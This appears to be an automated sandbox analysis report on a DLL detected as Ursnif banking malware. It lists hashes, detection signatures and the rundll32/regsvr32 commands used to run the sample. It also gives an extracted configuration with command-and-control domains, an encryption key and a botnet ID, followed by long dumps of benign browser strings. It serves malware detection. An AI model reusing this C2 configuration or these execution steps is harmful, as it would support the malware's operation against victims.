Play interactive tour

Edit tour

Windows Analysis Report 2zTgaLRFkL.dll

Overview

General Information

Sample Name:	2zTgaLRFkL.dll
Analysis ID:	526326
MD5:	096d27e730a16660704e6713fdc89173
SHA1:	880a73f218d5b4ba3f734c14ed3b84ef036aa85a
SHA256:	5bbba6d13c8222ef2cc5c4aecf14043f1e74d164ab2a1b3e4b68ee6cb086900c
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Ursnif

Tries to detect virtualization through RDTSC time measurements

Potentially malicious time measurement code found

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Tries to load missing DLLs

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Registers a DLL

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 5092 cmdline: loaddll32.exe "C:\Users\user\Desktop\2zTgaLRFkL.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 2244 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2zTgaLRFkL.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4888 cmdline: rundll32.exe "C:\Users\user\Desktop\2zTgaLRFkL.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

regsvr32.exe (PID: 2076 cmdline: regsvr32.exe /s C:\Users\user\Desktop\2zTgaLRFkL.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

iexplore.exe (PID: 764 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 5164 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:764 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

rundll32.exe (PID: 5132 cmdline: rundll32.exe C:\Users\user\Desktop\2zTgaLRFkL.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4380 cmdline: rundll32.exe C:\Users\user\Desktop\2zTgaLRFkL.dll,abetfoehywujav MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6004 cmdline: rundll32.exe C:\Users\user\Desktop\2zTgaLRFkL.dll,abjqkqaxstop MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "v1wySnSj0/Qezkq1+zqVG7OQdnxYD8ELZYNPMCkM69BOSUxuoiK8V9jGPFM/rZ9NhfGzVodUM3YW0nB89rcH84RZYG8DLN6HQCkubhXRasaUA7K7h+3lZamvjyookCKgwBWzlu6vCX1eURNonlpROKDMQKBVqofzDshoxJHbAdjZcKqCfEt5vgt07jQB8OABEnd9fROXGjobZcsdaOkEjTvELBFteszn3jqJa1HvAPkpE5gs00qstYhkLp1L+MgFUoKXEL4WViIcGGNpbyyXZKBlebQs4TypEMrC0SUg0PsB7mmSQ4ESN3oL02+qpL14r8rTcWPMVTQH9/bLARbe3XOvj+AriFcBjSRm8ai2Vy0=", "c2_domain": ["microsoft.com/windowsdisabler", "https://technoshoper.com", "https://avolebukoneh.website", "http://technoshoper.com", "http://avolebukoneh.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.911757798.0000000004620000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000002.00000002.911635582.0000000004600000.00000004.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000005.00000002.911557435.0000000002ED0000.00000040.00000010.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
00000005.00000002.911406171.0000000002EB0000.00000004.00000010.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Unpacked PEs

Source	Rule	Description	Author
5.2.rundll32.exe.2ed0000.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.regsvr32.exe.4620000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.2.rundll32.exe.2eb0000.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.regsvr32.exe.4620000.1.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
2.2.regsvr32.exe.4600000.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
5.2.rundll32.exe.2ed0000.1.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 2.2.regsvr32.exe.4620000.1.unpack

Malware Configuration Extractor: Ursnif {"RSA Public Key": "v1wySnSj0/Qezkq1+zqVG7OQdnxYD8ELZYNPMCkM69BOSUxuoiK8V9jGPFM/rZ9NhfGzVodUM3YW0nB89rcH84RZYG8DLN6HQCkubhXRasaUA7K7h+3lZamvjyookCKgwBWzlu6vCX1eURNonlpROKDMQKBVqofzDshoxJHbAdjZcKqCfEt5vgt07jQB8OABEnd9fROXGjobZcsdaOkEjTvELBFteszn3jqJa1HvAPkpE5gs00qstYhkLp1L+MgFUoKXEL4WViIcGGNpbyyXZKBlebQs4TypEMrC0SUg0PsB7mmSQ4ESN3oL02+qpL14r8rTcWPMVTQH9/bLARbe3XOvj+AriFcBjSRm8ai2Vy0=", "c2_domain": ["microsoft.com/windowsdisabler", "https://technoshoper.com", "https://avolebukoneh.website", "http://technoshoper.com", "http://avolebukoneh.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Source: 2zTgaLRFkL.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.70.134:443 -> 192.168.2.5:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.70.134:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.203.102:443 -> 192.168.2.5:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.203.102:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49762 version: TLS 1.2

Source: 2zTgaLRFkL.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_73215FE6 FindFirstFileExW,		0_2_73215FE6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_73215FE6 FindFirstFileExW,		2_2_73215FE6

Source: Joe Sandbox View

JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c

Source: Joe Sandbox View	IP Address: 104.26.3.70 104.26.3.70
Source: Joe Sandbox View	IP Address: 172.67.70.134 172.67.70.134

Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756

Source: de-ch[1].htm.6.dr	String found in binary or memory: <a href="https://www.facebook.com/" target="_blank" data-piitxt="facebooklite" piiurl="https://www.facebook.com/"> equals www.facebook.com (Facebook)
Source: msapplication.xml2.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x81446d26,0x01d7dff0</date><accdate>0x835a7b73,0x01d7dff0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml7.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x88561c8b,0x01d7dff0</date><accdate>0x8b868e13,0x01d7dff0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml0.4.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x8bf8fed4,0x01d7dff0</date><accdate>0x8c159c3d,0x01d7dff0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: de-ch[1].htm.6.dr	String found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="https://www.bing.com" /><link rel="preconnect" href="//web.vortex.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="https://www.bing.com" /><link rel="dns-prefetch" href="//web.vortex.data.msn.com" /><link rel="canonical" href="https://www.msn.com/de-ch/" /><meta name="msapplication-TileColor" content="#224f7b"/><meta name="msapplication-TileImage" content="//static-global-s-msn-com.akamaized.net/hp-neu/sc/1f/08ced4.png"/><meta name="msapplication-config" content="none"/> <title>MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: glich.",errorFooterText:"Zu Twitter wechseln",taskLinks:"Benachrichtigungen\|https://twitter.com/i/notifications;Ich\|#;Abmelden\|#"}],xbox:[{header:"Spotlight",content:"",footerText:"Alle anzeigen",footerUrl:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"},{header:"Meine tolle Wiedergabeliste",headerUrl:"https://aka.ms/qeqf5y",content:"",errorMessage:"",taskLinks:"me_groove_taskLinks_store\|https://www.microsoft.com/store/media/redirect/music?view=hub;me_groove_taskLinks_play\|https://aka.ms/Ixhi8e;me_groove_taskLinks_try\|https://aka.ms/msvmj1"}],bingrewards:[{header:"Pr equals www.twitter.com (Twitter)
Source: de-ch[1].htm.6.dr	String found in binary or memory: hren, die sich auf Ihren Internetdatenverkehr auswirken.<br/><br/><a href=\""+e.html(f)+'" onclick="window.location.reload(true)">Klicken Sie hier<\/a> um diese Seite erneut zu laden, oder besuchen Sie: <a href="'+i+'">'+i+"<\/a><\/p><\/div><div id='errorref'><span>Ref 1: "+e.html(o(t.clientSettings.aid))+"   Ref 2: "+e.html(t.clientSettings.sid\|\|"000000")+"   Ref 3: "+e.html((new r.Date).toUTCString())+"<\/span><\/div><\/div>"});ot({errId:1512,errMsg:n})}function ot(n){require(["track"],function(t){var i={errId:n.errId,errMsg:n.errMsg,reportingType:0};t.trackAppErrorEvent(i)})}function tt(){var n=v(arguments);a(l(n,b),n,!0)}function st(){var n=v(arguments);a(l(n,h),n)}function ht(){var n=v(arguments);a(l(n,y),n)}function ct(n){(r.console\|\|{}).timeStamp?console.timeStamp(n):(r.performance\|\|{}).mark&&r.performance.mark(n)}var w=0,it=-1,b=0,h=1,y=2,s=[],p,k,rt,o,d=!1,c=Math.random()*100<=-1;return ut(r,function(n,t,i,r){return w++,n=nt(n,t,i,r," [ENDMESSAGE]"),n&&tt("[SCRIPTERROR] "+n),!0}),c&&require(["jquery","c.deferred"],function(n){k=!0;rt=n;s.length&&g()}),{error:tt,fatalError:et,unhandledErrorCount:function(){return w},perfMark:ct,warning:st,information:ht}});require(["viewAwareInit"],function(n){n({size2row:"(min-height: 48.75em)",size1row:"(max-height: 48.74em)",size4column:"(min-width: 72em)",size3column:"(min-width: 52.313em) and (max-width: 71.99em)",size2column:"(min-width: 43.75em) and (max-width: 52.303em)",size2rowsize4column:"(min-width: 72em) and (min-height: 48.75em)",size2rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (min-height: 48.75em)",size2rowsize2column:"(max-width: 52.303em) and (min-height: 48.75em)",size1rowsize4column:"(min-width: 72em) and (max-height: 48.74em)",size1rowsize3column:"(min-width: 52.313em) and (max-width: 71.99em) and (max-height: 48.74em)",size1rowsize2column:"(max-width: 52.303em) and (max-height: 48.74em)"})});require(["deviceInit"],function(n){n({AllowTransform3d:"false",AllowTransform2d:"true",RtlScrollLeftAdjustment:"none",ShowMoveTouchGestures:"true",SupportFixedPosition:"true",UseCustomMatchMedia:null,Viewport_Behavior:"Default",Viewport_Landscape:null,Viewport:"width=device-width,initial-scale=1.0",IsMobileDevice:"false"})})</script><meta property="sharing_url" content="https://www.msn.com/de-ch"/><meta property="og:url" content="https://www.msn.com/de-ch/"/><meta property="og:title" content="MSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365"/><meta property="twitter:card" content="summary_large_image"/><meta property="og:type" content="website"/><meta property="og:site_name" content="MSN"/><meta property="og:image" content="https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg"/><link rel="shortcut icon" href="//static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico" /><style>@media screen and (max-width:78.99em) and (min-width:58.875em){.layout-none:not(.mod1) .pos2{left:0}}.ie8 .grid .pick4~li.pick
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.facebook.com (Facebook)
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen\|https://outlook.live.com/mail/deeplink/compose;Kalender\|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online\|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online\|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway\|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online\|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)

Source: de-ch[1].htm.6.dr	String found in binary or memory: http://ogp.me/ns#
Source: de-ch[1].htm.6.dr	String found in binary or memory: http://ogp.me/ns/fb#
Source: {8D788005-4BE3-11EC-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: imagestore.dat.6.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: msapplication.xml1.4.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml3.4.dr	String found in binary or memory: http://www.google.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
Source: msapplication.xml4.4.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml5.4.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml6.4.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml7.4.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml.4.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml0.4.dr	String found in binary or memory: http://www.youtube.com/
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://amzn.to/2TTxhNg
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://apps.apple.com/ch/app/microsoft-news/id945416273?pt=80423&ct=prime_footer&mt=8
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.dr	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/oneTrust/1.2/consent/55a804ab-e5c6-4b97-9319-86263d36
Source: auction[2].htm.6.dr	String found in binary or memory: https://beap.gemini.yahoo.com/mbclk?bv=1.0.0&es=MJ_W730GIS_QkG6Z3slmnzoRpVQc.g8KNhy8thvyLfijZDMu
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.dr	String found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
Source: auction[2].htm.6.dr	String found in binary or memory: https://cdn.flurry.com/adTemplates/templates/htmls/clips.html"
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_promotionalstripe_na
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://client-s.gateway.messenger.live.com
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=195119&a=3064090&g=25021476
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24545562
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://clkde.tradedoubler.com/click?p=295926&a=3064090&g=24886692
Source: {8D788005-4BE3-11EC-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&http
Source: {8D788005-4BE3-11EC-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: {8D788005-4BE3-11EC-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://doceree.com/.well-known/deviceStorage.json
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://doceree.com/us-privacy-policy/
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://evorra.com/product-privacy-policy/
Source: 55a804ab-e5c6-4b97-9319-86263d365d28[2].json.6.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: auction[2].htm.6.dr	String found in binary or memory: https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&es=1pthyrgGIS_CP6RinMZ9JLQidWOhQxu_ti3Yy1VE1q4K
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&ct=1637587730&rver=7.0.6730.0&am
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://login.live.com/logout.srf?ct=1637587731&rver=7.0.6730.0&lc=1033&id=1184&lru=
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&rpsnv=13&ct=1637587730&rver=7.0.6730.0&w
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://nextmillennium.io/privacy-policy/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/#qt=mru
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com/about/en/download/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com;Fotos
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com;OneDrive-App
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://optimise-it.de/datenschutz
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://outlook.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://outlook.live.com/calendar
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer
Source: auction[2].htm.6.dr	String found in binary or memory: https://policies.oath.com/us/en/oath/privacy/index.html
Source: {8D788005-4BE3-11EC-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
Source: auction[2].htm.6.dr	String found in binary or memory: https://s.yimg.com/lo/api/res/1.2/CHE6ysqAlt744fnx0c7isA--~A/Zmk9ZmlsbDt3PTYyMjtoPTM2ODthcHBpZD1nZW1
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://secure.adnxs.com/clktrb?id=764680&t=1
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://silvermob.com/privacy
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://smartyads.com/privacy-policy
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://sp.booking.com/index.html?aid=1589774&label=travelnavlink
Source: auction[2].htm.6.dr	String found in binary or memory: https://srtb.msn.com:443/notify/viewedg?rid=89e9c689e4e442bc8decc0870f35ae96&r=infopane&i=1&
Source: ~DFBB4D173838662490.TMP.4.dr, imagestore.dat.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAQYSTg.img?h=368&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://support.skype.com
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://twitter.com/
Source: 52-478955-68ddb2ab[1].js.6.dr	String found in binary or memory: https://twitter.com/i/notifications;Ich
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://www.bidstack.com/privacy-policy/
Source: iab2Data[1].json.6.dr	String found in binary or memory: https://www.botman.ninja/privacy-policy
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.ebay.ch/?mkcid=1&mkrid=5222-53480-19255-0&siteid=193&campid=5338626668&t
Source: imagestore.dat.6.dr	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/
Source: {8D788005-4BE3-11EC-90E5-ECF4BB570DC9}.dat.4.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
Source: de-ch[1].htm.6.dr	String found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
